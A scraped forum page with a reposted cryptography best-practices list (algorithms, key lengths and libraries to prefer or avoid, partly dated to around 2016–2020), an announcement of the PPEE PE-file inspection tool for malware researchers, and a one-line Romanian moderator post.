http://gallium.inria.fr/blog/intel-skylake-bug/
  22. Symmetric Encryption The only way to encrypt today is authenticated encryption, or "AEAD". ChaCha20-Poly1305 is faster in software than AES-GCM. AES-GCM will be faster than ChaCha20-Poly1305 with AES-NI. Poly1305 is also easier than GCM for library designers to implement safely. AES-GCM is the industry standard. Use, in order of preference: The NaCl/libsodium default Chacha20-Poly1305 AES-GCM Avoid: AES-CBC, AES-CTR by itself Block ciphers with 64-bit blocks such as Blowfish OFB mode RC4, which is comically broken Symmetric Key Length See The Physics of Brute Force to understand why 256-bit keys is more than sufficient. But rememeber: your AES key is far less likely to be broken than your public key pair, so the latter key size should be larger if you're going to obsess about this. Use: Minimum- 128-bit keys Maximum- 256-bit keys Avoid: Constructions with huge keys Cipher "cascades" Key sizes under 128 bits Symmetric Signatures If you're authenticating but not encrypting, as with API requests, don't do anything complicated. There is a class of crypto implementation bugs that arises from how you feed data to your MAC, so, if you're designing a new system from scratch, Google "crypto canonicalization bugs". Also, use a secure compare function. Use: HMAC Avoid: HMAC-MD5 HMAC-SHA1 Custom "keyed hash" constructions Complex polynomial MACs Encrypted hashes Anything CRC Hashing/HMAC Algorithm If you can get away with it you want to use hashing algorithms that truncate their output and sidesteps length extension attacks. Meanwhile: it's less likely that you'll upgrade from SHA-2 to SHA-3 than it is that you'll upgrade from SHA-2 to BLAKE2, which is faster than SHA-3, and SHA-2 looks great right now, so get comfortable and cuddly with SHA-2. Use, in order of preference: HMAC-SHA-512/256 HMAC-SHA-512/224 HMAC-SHA-384 HMAC-SHA-224 HMAC-SHA-512 HMAC-SHA-256 Alternately, use in order of preference: BLAKE2 SHA3-512 SHA3-256 Avoid: HMAC-SHA-1 HMAC-MD5 MD6 EDON-R Random IDs When creating random IDs, numbers, URLs, nonces, initialization vectors, or anything that is random, then you should always use /dev/urandom. Use: /dev/urandom Create: 256-bit random numbers Avoid: Userspace random number generators /dev/random Password Hashing When using scrypt for password hashing, be aware that It is very sensitive to the parameters, making it possible to end up weaker than bcrypt, and suffers from time-memory trade-off (source #1 and source #2). When using bcrypt, make sure to use the following algorithm to prevent the leading NULL byte problem and the 72-character password limit: bcrypt(base64(sha-512(password))) I'd wait a few years, until 2020 or so, before implementing any of the Password Hashing Competition candidates, such as Argon2. They just haven't had the time to mature yet. Use, in order of preference: scrypt bcrypt sha512crypt sha256crypt PBKDF2 Avoid: Plaintext Naked SHA-2, SHA-1, MD5 Complex homebrew algorithms Any encryption algorithm Asymmetric Encryption It's time to stop using vanilla RSA, and start using NaCl/libsodium. Of all the cryptographic "best practices", this is the one you're least likely to get right on your own. NaCl/libsodium has been designed to prevent you from making stupid mistakes, it's highly favored among the cryptographic community, and focuses on modern, highly secure cryptographic primitives. It's time to start using ECC. Here are several reasons you should stop using RSA and switch to elliptic curve software: Progress in attacking RSA --- really, all the classic multiplicative group primitives, including DH and DSA and presumably ElGamal --- is proceeding faster than progress against elliptic curve. RSA (and DH) drag you towards "backwards compatibility" (ie: downgrade-attack compatibility) with insecure systems. Elliptic curve schemes generally don't need to be vigilant about accidentally accepting 768-bit parameters. RSA begs implementors to encrypt directly with its public key primitive, which is usually not what you want to do: not only does accidentally designing with RSA encryption usually forfeit forward-secrecy, but it also exposes you to new classes of implementation bugs. Elliptic curve systems don't promote this particular foot-gun. The weight of correctness/safety in elliptic curve systems falls primarily on cryptographers, who must provide a set of curve parameters optimized for security at a particular performance level; once that happens, there aren't many knobs for implementors to turn that can subvert security. The opposite is true in RSA. Even if you use RSA-OAEP, there are additional parameters to supply and things you have to know to get right. If you have to use RSA, do use RSA-OAEP. But don't use RSA. Use ECC. Use: NaCl/libsodium Avoid: RSA-PKCS1v15 RSAES-OAEP RSASSA-PSS with MGFI-256, Really, anything RSA ElGamal OpenPGP, OpenSSL, BouncyCastle, etc. Asymmetric Key Length As with symmetric encryption, asymmetric encryption key length is a vital security parameter. Academic, private, and government organizations provide different recommendations with mathematical formulas to approimate the minimum key size requirement for security. See BlueKcrypt's Cryptographyc Key Length Recommendation for other recommendations and dates. To protect data up through 2020, it is recommended to meet the minimum requirements for asymmetric key lengths: Method RSA ECC D-H Key D-H Group Lenstra/Verheul 1881 161 151 1881 Lenstra Updated 1387 163 163 1387 ECRYPT II 1776 192 192 1776 NIST 2048 224 224 2048 ANSSI 2048 200 200 2048 BSI 3072 256 256 3072 See also the NSA Fact Sheet Suite B Cryptography and RFC 3766 for additional recommendations and math algorithms for calculating strengths based on calendar year. Personally, I don't see any problem with using 2048-bit RSA/DH group and 256-bit ECC/DH key lengths. So, my recommendation would be: Use: 256-bit minimum for ECC/DH Keys 2048-bit minimum for RSA/DH Group Avoid: Not following the above recommendations. Asymmetric Signatures In the last few years there has been a major shift away from conventional DSA signatures and towards misuse-resistent "deterministic" signature schemes, of which EdDSA and RFC6979 are the best examples. You can think of these schemes as "user-proofed" responses to the Playstation 3 ECDSA flaw, in which reuse of a random number leaked secret keys. Use deterministic signatures in preference to any other signature scheme. Use, in order of preference: NaCl/libsodium Ed25519 RFC6979 (deterministic DSA/ECDSA) Avoid: RSA-PKCS1v15 RSASSA-PSS with MGF1+SHA256 Really, anything RSA Vanilla ECDSA Vanilla DSA Diffie-Hellman This is the trickiest one. Here is roughly the set of considerations: If you can just use Nacl, use Nacl. You don't even have to care what Nacl does. If you can use a very trustworthy library, use Curve25519; it's the modern ECDH curve with the best software support and the most analysis. People really beat the crap out of Curve25519 when they tried to get it standardized for TLS. There are stronger curves, but none supported as well as Curve25519. But don't implement Curve25519 yourself or port the C code for it. If you can't use a very trustworthy library for ECDH but can for DH, use DH-2048 with a standard 2048 bit group, like Colin says, but only if you can hardcode the DH parameters. But don't use conventional DH if you need to negotiate parameters or interoperate with other implementations. If you have to do handshake negotiation or interoperate with older software, consider using NIST P-256, which has very widespread software support. Hardcoded-param DH-2048 is safer than NIST P-256, but NIST P-256 is safer than negotiated DH. But only if you have very trustworthy library support, because NIST P-256 has some pitfalls. P-256 is probably the safest of the NIST curves; don't go down to -224. Isn't crypto fun? If your threat model is criminals, prefer DH-1024 to sketchy curve libraries. If your threat model is governments, prefer sketchy curve libraries to DH-1024. But come on, find a way to one of the previous recommendations. It sucks that DH (really, "key agreement") is such an important crypto building block, but it is. Use, in order of preference: NaCl/libsodium 2048-bit Diffie-Hellman Group #14 Avoid: conventional DH SRP J-PAKE Handshakes and negotiation Elaborate key negotiation schemes that only use block ciphers srand(time()) Website security By "website security", we mean "the library you use to make your web server speak HTTPS". Believe it or not, OpenSSL is still probably the right decision here, if you can't just delegate this to Amazon and use HTTPS elastic load balancers, which makes this their problem not yours. Use: OpenSSL, LibreSSL, or BoringSSL if you run your own site Amazon AWS Elastic Load Balancing if Amazon does Avoid: PolarSSL GnuTLS MatrixSSL Client-server application security What happens when you design your own custom RSA protocol is that 1-18 months afterwards, hopefully sooner but often later, you discover that you made a mistake and your protocol had virtually no security. A good example is Salt Stack. Salt managed to deploy e=1 RSA. It seems a little crazy to recommend TLS given its recent history: The Logjam DH negotiation attack The FREAK export cipher attack The POODLE CBC oracle attack The RC4 fiasco The CRIME compression attack The Lucky13 CBC padding oracle timing attack The BEAST CBC chained IV attack Heartbleed Renegotiation Triple Handshakes Compromised CAs Here's why you should still use TLS for your custom transport problem: Many of these attacks only work against browsers, because they rely on the victim accepting and executing attacker-controlled Javascript in order to generate repeated known/chosen plaintexts. Most of these attacks can be mitigated by hardcoding TLS 1.2+, ECDHE and AES-GCM. That sounds tricky, and it is, but it's less tricky than designing your own transport protocol with ECDHE and AES-GCM! In a custom transport scenario, you don't need to depend on CAs: you can self-sign a certificate and ship it with your code, just like Colin suggests you do with RSA keys. Use: TLS Avoid: Designing your own encrypted transport, which is a genuinely hard engineering problem; Using TLS but in a default configuration, like, with "curl" Using "curl" IPSEC Online backups Of course, you should host your own backups in house. The best security is the security where others just don't get access to your data. There are many tools to do this, all of which should be using OpenSSH or TLS for the transport. If using an online backup service, use Tarsnap. It's withstood the test of time. Use: Tarsnap Avoid: Google Apple Microsoft Dropbox Amazon S3 Sursa: https://gist.github.com/atoponce/07d8d4c833873be2f68c34f9afc5a78a
      • 2
      • Upvote
  23. PPEE (puppy) is a Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more details Puppy is free and tries to be small, fast, nimble and friendly as your puppy Download v1.09 Visual C++ 2010 Redistributable Package required Features Puppy is robust against malformed and crafted PE files which makes it handy for reversers, malware researchers and those who want to inspect PE files in more details. All directories in a PE file including Export, Import, Resource, Exception, Certificate(Relies on Windows API), Base Relocation, Debug, TLS, Load Config, Bound Import, IAT, Delay Import and CLR are supported. Both PE32 and PE64 support Examine YARA rules against opened file Virustotal and OPSWAT's Metadefender query report Statically analyze windows native and .Net executables Robust Parsing of exe, dll, sys, scr, drv, cpl, ocx and more Edit almost every data structure Easily dump sections, resources and .Net assembly directories Entropy and MD5 calculation of the sections and resource items View strings including URL, Registry, Suspicious, ... embedded in files Detect common resource types Extract artifacts remained in PE file Anomaly detection Right-click for Copy, Search in web, Whois and dump Built in hex editor Explorer context menu integration Descriptive information for data members Refresh, Save and Save as menu commands Drag and drop support List view columns can sort data in an appropriate way Open file from command line Checksum validation Plugin enabled Link: https://www.mzrst.com/
      • 2
      • Upvote
  24. Suna dubios rau. Ban.
×
×
  • Create New...